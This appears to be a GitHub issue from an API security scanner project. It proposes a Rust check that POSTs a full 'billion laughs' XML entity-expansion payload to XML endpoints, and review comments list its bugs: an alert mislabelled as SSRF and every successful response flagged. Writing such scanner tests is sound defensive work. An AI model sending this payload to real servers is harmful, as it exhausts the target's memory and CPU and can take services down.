Open RazMag opened 1 year ago
This is a check suggested by @DeliciousBounty. It is currently not implemented until testing levels are implemented, since it could be destructive.
/// XML entity-expansion ("billion laughs") check.
///
/// For every recorded payload whose path has a `POST` operation that declares an
/// `application/xml` request body, this sends a document with nested entity
/// definitions and records the request, the response and the round-trip time.
///
/// The payload is designed to exhaust the target XML parser's memory/CPU, which is
/// why the issue keeps the check disabled until testing levels exist: it must only
/// run under an explicit, opt-in destructive testing level.
///
/// # Arguments
/// * `auth` - credentials cloned into each outgoing `AttackRequest`.
///
/// # Returns
/// The accumulated `CheckRetVal` (alerts in `.0`, request/response log in `.1`)
/// and one `Duration` per request attempted, in send order.
///
/// # Panics
/// If `self.oas.servers()` is `None` or the server list is empty (see the
/// `unwrap()` calls below).
///
/// Review notes, not fixed here: the alert text says "ssrf" although this is an
/// XML bomb check; the `.next()` after the filter means at most one operation is
/// tested per payload entry; every `Ok` response is reported as a finding
/// regardless of status or timing, so a target that rejects the document is still
/// flagged; the `println!`/`print!` calls are debug output.
pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) {
    // Nested entity definitions: each level references the previous one ten times.
    // Literal kept byte-for-byte.
    let body = format!(
        r#" <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz "#
    );
    let mut ret_val = CheckRetVal::default();
    let mut vec_time = vec![];
    for oas_map in self.payloads.iter() {
        // `json_path` and `schema` are not used by this check; the loop only
        // repeats the request once per entry of the payload map.
        for (json_path, schema) in &oas_map.payload.map {
            // Only the first POST operation advertising an application/xml request
            // body is taken: `.next()` turns the filtered iterator into an Option,
            // so this `for` runs at most once per payload entry.
            for (m, _operation) in oas_map
                .path
                .path_item
                .get_ops()
                .iter()
                .filter(|(m, _)| m == &Method::POST)
                .filter(|(_method, operation)| {
                    // NOTE(review): assumes `request_body` is an Option whose
                    // payload has a Default impl and that `inner` resolves it
                    // against the whole document — confirm against the OAS model.
                    operation
                        .request_body
                        .clone()
                        .unwrap_or_default()
                        .inner(&self.oas_value)
                        .content
                        .into_keys()
                        .collect::<Vec<String>>()
                        .contains(&"application/xml".to_string())
                })
                .next()
            {
                // Debug output (review: remove or route through the logger).
                println!("ENCONDING {:?}", &oas_map.path.path);
                let h = MHeader {
                    name: "Content-type".to_string(),
                    value: "application/xml".to_string(),
                };
                // Panics when the document declares no servers; only the first
                // server entry is ever used.
                let base_url = self.oas.servers().unwrap().iter().next().unwrap().clone();
                let req = AttackRequest::builder()
                    .uri(&base_url.url, &oas_map.path.path)
                    .method(*m)
                    .headers(vec![h])
                    .payload(&body)
                    .parameters(vec![])
                    .auth(auth.clone())
                    .build();
                print!("XML BOMB : ");
                // Round-trip time is recorded whether or not the send succeeds;
                // nothing below uses it as a detection signal.
                let start = Instant::now();
                if let Ok(res) = req.send_request(true).await {
                    // logging request/response/description
                    ret_val.1.push(&req, &res, "Test for XML BOMB".to_string());
                    // Every Ok response becomes an alert, and the message names
                    // SSRF rather than XML entity expansion (review: fix wording).
                    ret_val.0.push((
                        ResponseData {
                            location: oas_map.path.path.clone(),
                            alert_text: format!(
                                "This parameter on the endpoint seems to be vulerable to ssrf.",
                            ),
                        },
                        res.clone(),
                    ));
                    println!(
                        "{}:{}",
                        "Status".green().bold(),
                        res.status.to_string().magenta()
                    );
                } else {
                    println!("REQUEST FAILED");
                }
                vec_time.push(start.elapsed());
            }
        }
    }
    (ret_val, vec_time)
}
This is a check suggested by @DeliciousBounty. It is currently not implemented until testing levels are implemented, since it could be destructive.